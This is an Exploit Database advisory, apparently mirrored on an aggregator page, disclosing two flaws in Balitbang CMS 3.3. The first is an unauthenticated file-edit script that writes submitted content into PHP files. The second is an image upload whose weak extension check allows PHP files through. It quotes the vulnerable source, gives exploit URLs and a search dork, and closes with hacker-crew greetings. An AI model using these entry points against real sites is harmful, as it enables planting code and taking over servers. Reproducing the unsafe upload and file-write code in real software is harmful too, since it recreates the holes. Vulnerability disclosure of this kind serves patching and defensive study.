Balitbang CMS 3.3 – Multiple Vulnerabilities

Exploit Database
110 阅读

作者： Xr0b0t

日期： 2011-03-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17006/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

[!]===========================================================================[!]

[~] CMS Balitbang Edit File Vulnerability

[~] Author : Xr0b0t (xrt.interpol@gmx.us)

[~] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com

[~] Date : 18 Mart, 2010

[~] Tested on : BlackBuntu RC2

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : kajianwebsite.org

[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip

[+] Price : free

[+] Vulnerability : Local File Editing

[+] Dork : Xr0b0t Was Here ;)

[+] Version : version 3.3

[!]===========================================================================[!]

[ Default Site ]

http://127.0.0.1/

[ XpL ]

http://127.0.0.1/litbang//functions/editfile.php

[code]

<?php

if ($save=='simpan') {

$dwrite = fopen("../modul/tag_".$file.".php", "w");

$nfile = stripslashes($nfile);

fputs ($dwrite, $nfile);

fclose ($dwrite);

echo "File sudah disimpan....Silahkan tutup jendela ini";

//header("Location: ../admin/admin.php?mode=konf&kd=berhasil");

}

else {

$dread = file("../modul/tag_".$file.".php");

for ($i=0; $i <= count($dread); $i++) {

$output .= $dread[$i];

}

echo "<form action='editfile.php' method=post>File Name : <input type=text name=nmfile value='tag_".$file.".php'> Jarngan diganti<br><textarea name=nfile cols=80 rows=20>$output</textarea><br><input type=hidden name=file value='$file' >

<input type=submit value='Simpan' ><input type=hidden name='save' value='simpan' ></form>";

}

[ Result In ]

http://127.0.0.1/litbang//modul/tag_.php

[ Demo ]

exploit : http://127.0.0.1/litbang/functions/editfile.php

Result : http://127.0.0.1/litbang/modul/tag_.php

etc etc etc ;]

[!]===========================================================================[!]

[~] CMS Balitbang admin_gambar v3.3 File upload vulnerabilities

[~] Author : Xr0b0t (xrt.interpol@gmx.us)

[~] Descovery By : k4l0ng666 a.k.a Hijack_Edan Ganteng sekali Tapi Tetep Gantengan saya

[~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net

[~] Date : 19 Mart, 2010

[~] Tested on : BlackBuntu RC2

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.balitbang.depdiknas.go.id/

[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip

[+] Price : free

[+] Vulnerability : LFD

[+] Dork : Xr0b0t Was Here ;)

[+] Version : CMS V3.3

[+] Advisories : http://exploit-id.com/web-applications/cms-balitbang-admin_gambar-v3-3-file-upload-vulnerabilities

[+] Original Post : http://blog.xrobot.mobi/x86/cms-balitbang-admin_gambar-v3-3-file-upload-vulnerabilities

[!]===========================================================================[!]

[ Vulnerable Source Code: ]

[code]

<html>

<head>

<title>Insert Gambar</title>

</head>

function add_gambar(code) {

opener.document.RTEDemo.data.value +=code;

//oRTE.document.execCommand('InsertImage', false, code);

}

</script>

<?php if ($save=='') { ?>

<td>Gambar : <input type="file" name="myimage" >    <input type="submit" value="Upload"></td></form>

</tr>

<tr>

<td>Masukkan Gambar dengan format Gif atau Jpg, tidak lebih dari 200 Kb</td>

</tr>

</table>

<?php }

else {

if(!empty($myimage_name))

{

$limitedext = array(".gif",".jpg");

$size_bytes =204800; //51200 bytes = 50KB.

$ext = strrchr($myimage_name,'.');

$ero='';

if (!in_array(strtolower($ext),$limitedext)) {

$ero .="Gambar tidak sesuai harus format GIF atau JPG"; }

if ($myimage_size > $size_bytes){

$ero .="File terlalu besar, tidak boleh lebih dari 200 Kb"; }

if ($ero=='') {

if(file_exists("../images/misc/".$myimage_name))

{ unlink("../images/misc/".$myimage_name); }

copy($myimage,"../images/misc/".$myimage_name);

$d="../images/misc/".$myimage_name;

<tr><td><img src="https://www.exploit-db.com/exploits/17006/<?php echo $d?>" width="200" height="100"></td><td>Kemudian Drag Gambar disamping ini menggunakan Mouse

Pindahkan ke Layout Text Data."

</td></tr>

</table>

<?php

}

else echo $ero.",<a href='https://www.exploit-db.com/exploits/17006/admin_gambar.php'>Kembali</a>";

}

else echo "Gambar tidak ada,<a href='https://www.exploit-db.com/exploits/17006/admin_gambar.php'>Kembali</a>";

}

</body>

</html>

[/code]

[ Default Site ]

http://127.0.0.1/

[ XpL ]

http://127.0.0.1/webtemp/functions/admin_gambar.php

[ Result In ]

http://127.0.0.1/webtemp/images/misc/"file name"

with a default configuration of this script, an attacker might be able to upload arbitrary

files containing malicious PHP code due to multiple file extensions isn't properly checked

Goo The IndonesianCoder!!!

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto DUDUl Kok G rene2...

[+] kaMtiEz Love Ayyunda Kalo Ane Xr0b0t Love Septyy !!

[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber

[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot

[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck

[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212,k4l0ng666,dr-Cruzz

[ NOTE ]

[+] OJOK JOTOS2an YO ..

[+] Minggir semua Arumbia Team Mau LEwat ;)

[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...

[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..

[+] Malang Cyber Crew & Magelang Cyber Community